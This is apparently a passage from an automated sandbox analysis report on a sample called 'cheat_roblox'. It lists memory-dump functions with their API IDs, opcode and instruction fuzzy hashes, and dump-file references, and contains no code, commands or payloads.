                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: File$CreateErrorLastMove$_invalid_parameter_noinfo_noreturn
                                                                              • String ID:
                                                                              • API String ID: 34527147-0
                                                                              • Opcode ID: 3d42be01f5da7359752b23aff0a4933365d5119f3f7d56a086558a804adc0db8
                                                                              • Instruction ID: 39b16a83d11ed0cda5c940588bcacbe1dce247c258b7c620aa06be510d953977
                                                                              • Opcode Fuzzy Hash: 3d42be01f5da7359752b23aff0a4933365d5119f3f7d56a086558a804adc0db8
                                                                              • Instruction Fuzzy Hash: 2891AF22B1864682EF21DB62D4562BE7369FB94BC8F405073EF0EA7B95DE38E545C340
                                                                              Function 00007FF693E651A4 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: Version
                                                                              • String ID:
                                                                              • API String ID: 1889659487-0
                                                                              • Opcode ID: 6220f8f0736b52f52a4f9f0684f7fcd1da0b773ba531a70ae5974f71c0de4052
                                                                              • Instruction ID: a6a906193636d02b9e48971516571769304aef8fb3f5fa7f6418bb100ceb3a3b
                                                                              • Opcode Fuzzy Hash: 6220f8f0736b52f52a4f9f0684f7fcd1da0b773ba531a70ae5974f71c0de4052
                                                                              • Instruction Fuzzy Hash: 7A01D775A086468AF6748B11E89677A32A9FBD8314F5002B6D65EA6794DF3CF8058A00
                                                                              Function 00007FF693E88C1C Relevance: 1.5, Strings: 1, Instructions: 219COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: _invalid_parameter_noinfo
                                                                              • String ID: 0
                                                                              • API String ID: 3215553584-4108050209
                                                                              • Opcode ID: 0fbd957179d89af9e1d3453d65279f22830f04fe064c784c04e338e6c7bf3646
                                                                              • Instruction ID: 5dcdb1bb7938c488ad8445de0c8009ca71d27c347d9d3e37107dc3fd59a4f661
                                                                              • Opcode Fuzzy Hash: 0fbd957179d89af9e1d3453d65279f22830f04fe064c784c04e338e6c7bf3646
                                                                              • Instruction Fuzzy Hash: 9D81F422E1824B86EAB88A15854267D23DDEF60748F1419B3DD09FB6D9CF3DEC46C342
                                                                              Function 00007FF693E889A0 Relevance: 1.4, Strings: 1, Instructions: 199COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: _invalid_parameter_noinfo
                                                                              • String ID: 0
                                                                              • API String ID: 3215553584-4108050209
                                                                              • Opcode ID: a261a21fa45f21d734edfefcd2ffe271b1157111beaf653bc061adca1a26389c
                                                                              • Instruction ID: d081fdbc178ea9eaf3125b1bfe2ad5d98fd9b10d8eeae55d306c92aaff348fd1
                                                                              • Opcode Fuzzy Hash: a261a21fa45f21d734edfefcd2ffe271b1157111beaf653bc061adca1a26389c
                                                                              • Instruction Fuzzy Hash: 5871E525E0C28B46FBB88A2980422BD2399DF81B44F1459F7DD49F76D6CE2DEC46C741
                                                                              Function 00007FF693E6C96C Relevance: 1.4, Strings: 1, Instructions: 142COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: gj
                                                                              • API String ID: 0-4203073231
                                                                              • Opcode ID: 226aa63bfce789330e15763d8953fb7d553c3450d9c1aa6f260de1088bdface5
                                                                              • Instruction ID: 6096b15b7f7ede01e5902ab6aa89470645baaa30c04a30f6690ef254795a9dee
                                                                              • Opcode Fuzzy Hash: 226aa63bfce789330e15763d8953fb7d553c3450d9c1aa6f260de1088bdface5
                                                                              • Instruction Fuzzy Hash: C5519037B286908BD764CF25E401A9A73A5F388758F445126EF4A93B09CB3DE945CF40
                                                                              Function 00007FF693E8C838 Relevance: 1.4, Strings: 1, Instructions: 139COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @
                                                                              • API String ID: 0-2766056989
                                                                              • Opcode ID: 49e7fa989fc271adaa8e130b28d1cae0d9f82f392019a5f874cdac11a507a941
                                                                              • Instruction ID: c93351855689a1b00c061cf819ebb81b0e2266f4a668771dd854b7b575118b06
                                                                              • Opcode Fuzzy Hash: 49e7fa989fc271adaa8e130b28d1cae0d9f82f392019a5f874cdac11a507a941
                                                                              • Instruction Fuzzy Hash: 0341BD36B14A4986EA18CF2AE4162A9B7A9E758FD0B499037DE0DE7754DE3CD482C300
                                                                              Function 00007FF693E90D20 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: HeapProcess
                                                                              • String ID:
                                                                              • API String ID: 54951025-0
                                                                              • Opcode ID: 4ce929ddb23f73c0a8458b43b9ad49d4d7e2a2f746430c3d48bba7e89996d797
                                                                              • Instruction ID: e426182b081d1c0455bafb4db3ae9b81a7a3dd2e0c8fadfd38421c879a99f350
                                                                              • Opcode Fuzzy Hash: 4ce929ddb23f73c0a8458b43b9ad49d4d7e2a2f746430c3d48bba7e89996d797
                                                                              • Instruction Fuzzy Hash: 8FB09220E17B06C2EA196F126C8326822E9FF58B00F9480BAD50CE1320DE2C24A54700
                                                                              Function 00007FF693E73964 Relevance: .9, Instructions: 931COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 93e830777a8553980f5fe243353a36f6d8d27a5fc8052bc9569f2c684e316ecf
                                                                              • Instruction ID: cb0e3e8fadc2224f3489e4f20b25320e73ead8b0d667b2399c81120c6d999707
                                                                              • Opcode Fuzzy Hash: 93e830777a8553980f5fe243353a36f6d8d27a5fc8052bc9569f2c684e316ecf
                                                                              • Instruction Fuzzy Hash: 9D8234A3A096C186D765CF28D4066FC3BA5E751B88F09817BCA4F97386EE3CD945C710
                                                                              Function 00007FF693E576C0 Relevance: .9, Instructions: 893COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: fb6bb4a62616f0bcd3e2e2126cd32946fe2ad160a7c0dbd4e5bd03ed1428d6a6
                                                                              • Instruction ID: 989aebe207377dbf0340c5e14a0bbdaeb82adbbe08d9fbfb7234cb486c0eac90
                                                                              • Opcode Fuzzy Hash: fb6bb4a62616f0bcd3e2e2126cd32946fe2ad160a7c0dbd4e5bd03ed1428d6a6
                                                                              • Instruction Fuzzy Hash: 3E628E9AD3AF9A1EE303A53954131D2E35C0EF74C9551E31BFCE431E66EB92A6832314
                                                                              Function 00007FF693E753F0 Relevance: .9, Instructions: 891COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 569adc29ececf777b1726fc3f5cd67d4b9927b4b604ee9515eb09b13eba64041
                                                                              • Instruction ID: 70c5ff149ff046b536230d0b70ff441a844115a0deb5b6863e0833f53cfd5287
                                                                              • Opcode Fuzzy Hash: 569adc29ececf777b1726fc3f5cd67d4b9927b4b604ee9515eb09b13eba64041
                                                                              • Instruction Fuzzy Hash: B98211B3A096C18ADB24CF28D4456FC7BA5F755B48F088176CA4EA778ADE3CD885C710
                                                                              Function 00007FF693E6BB90 Relevance: .6, Instructions: 587COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ffdf8f5a64276e3eb417e3b9ae5b43350349d41efb04db03fca9f8ba9e24336f
                                                                              • Instruction ID: b1df464099a577e1030061379e83eca300aa440bef54828681c5ba4dca276412
                                                                              • Opcode Fuzzy Hash: ffdf8f5a64276e3eb417e3b9ae5b43350349d41efb04db03fca9f8ba9e24336f
                                                                              • Instruction Fuzzy Hash: 0422E5B3B246508BD728CF15C89AE5E376AF798744B4B8229DF0ACB785DB38D505CB40
                                                                              Function 00007FF693E74B98 Relevance: .6, Instructions: 578COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 21143e83615dcc23e36b64f0d60848ac948cba63854c17a605a1a3ec217f9251
                                                                              • Instruction ID: 6c51db8e1ec9ee3c7400c68015f8740e568caabf3c1474bcc54f3d08ec893d6d
                                                                              • Opcode Fuzzy Hash: 21143e83615dcc23e36b64f0d60848ac948cba63854c17a605a1a3ec217f9251
                                                                              • Instruction Fuzzy Hash: D132DF72A086918BE72CCF24D551ABD37A5F754B08F05813ADB4BA7B89DF3CA851CB40
                                                                              Function 00007FF693E57288 Relevance: .3, Instructions: 294COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 063370d9e2e9571dc593e8358d008e0ec5385ad0435e9f2f5019d46da215c13b
                                                                              • Instruction ID: c3a945c4a67924adc6b07db22da076ce91764903ad8a9f44020a18b11dc0cf1f
                                                                              • Opcode Fuzzy Hash: 063370d9e2e9571dc593e8358d008e0ec5385ad0435e9f2f5019d46da215c13b
                                                                              • Instruction Fuzzy Hash: 50C19DB7B281908FE360CF7AE400A9D3BB1F39878CB519125DF59A7B09D639E645CB40
                                                                              Function 00007FF693E72D58 Relevance: .3, Instructions: 268COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 602477e063b5c1ca901f2159ae3c7fc010244aaa433e93e1960e83d539d05e76
                                                                              • Instruction ID: 09aaa403d1d437a2e404ef9b78d055ade82adf6fbd6c5a3962615372827484ac
                                                                              • Opcode Fuzzy Hash: 602477e063b5c1ca901f2159ae3c7fc010244aaa433e93e1960e83d539d05e76
                                                                              • Instruction Fuzzy Hash: 44A14573A0818286EB36CA24D4067FD2799EB94744F4545B6DA8FB7787CE3CE982C740
                                                                              Function 00007FF693E6AF18 Relevance: .2, Instructions: 244COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e3f156a61251d3696a660eff3e2c5499dd818c979554cbf7ea7c30eccab92618
                                                                              • Instruction ID: 8f0579f867a434dc7939627d23f435416085d754ac4e2fab12b5c7e4efc6483a
                                                                              • Opcode Fuzzy Hash: e3f156a61251d3696a660eff3e2c5499dd818c979554cbf7ea7c30eccab92618
                                                                              • Instruction Fuzzy Hash: 97C11677B295E04DE302CBB5A4248FD3FF5E71E30DB4A4152EF9666B4AC6285201DF60
                                                                              Function 00007FF693E5A310 Relevance: .2, Instructions: 230COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc
                                                                              • String ID:
                                                                              • API String ID: 190572456-0
                                                                              • Opcode ID: ba0d91b71a6ba36ace61fab0c0f7d4922daa1e3f8d028e3e8b3457ff5b2a4fa0
                                                                              • Instruction ID: 5efe00f27996f3dfc5a76ad60bc34b55383493b390d4949d470ac143af4e8b9d
                                                                              • Opcode Fuzzy Hash: ba0d91b71a6ba36ace61fab0c0f7d4922daa1e3f8d028e3e8b3457ff5b2a4fa0
                                                                              • Instruction Fuzzy Hash: 1F913262B1858196EF22CF29D4526FD2765FFA5788F441032EF4EA7749EE38E646C300
                                                                              Function 00007FF693E6B534 Relevance: .2, Instructions: 181COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: cfd80b8924012b3a81ce264cde7180753b201b1e387c519ebd9873ce58afa85e
                                                                              • Instruction ID: c1fcfb492c008ef4269153f09d36d2fe5bd4c3ef12ba9dc9fe8a1ec8b88f349c
                                                                              • Opcode Fuzzy Hash: cfd80b8924012b3a81ce264cde7180753b201b1e387c519ebd9873ce58afa85e
                                                                              • Instruction Fuzzy Hash: 60612166B085D649EB21CF7685114FD7BE9E719788B4680B3CF9AA3646CE38E106CB10
                                                                              Function 00007FF693E721D0 Relevance: .1, Instructions: 137COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
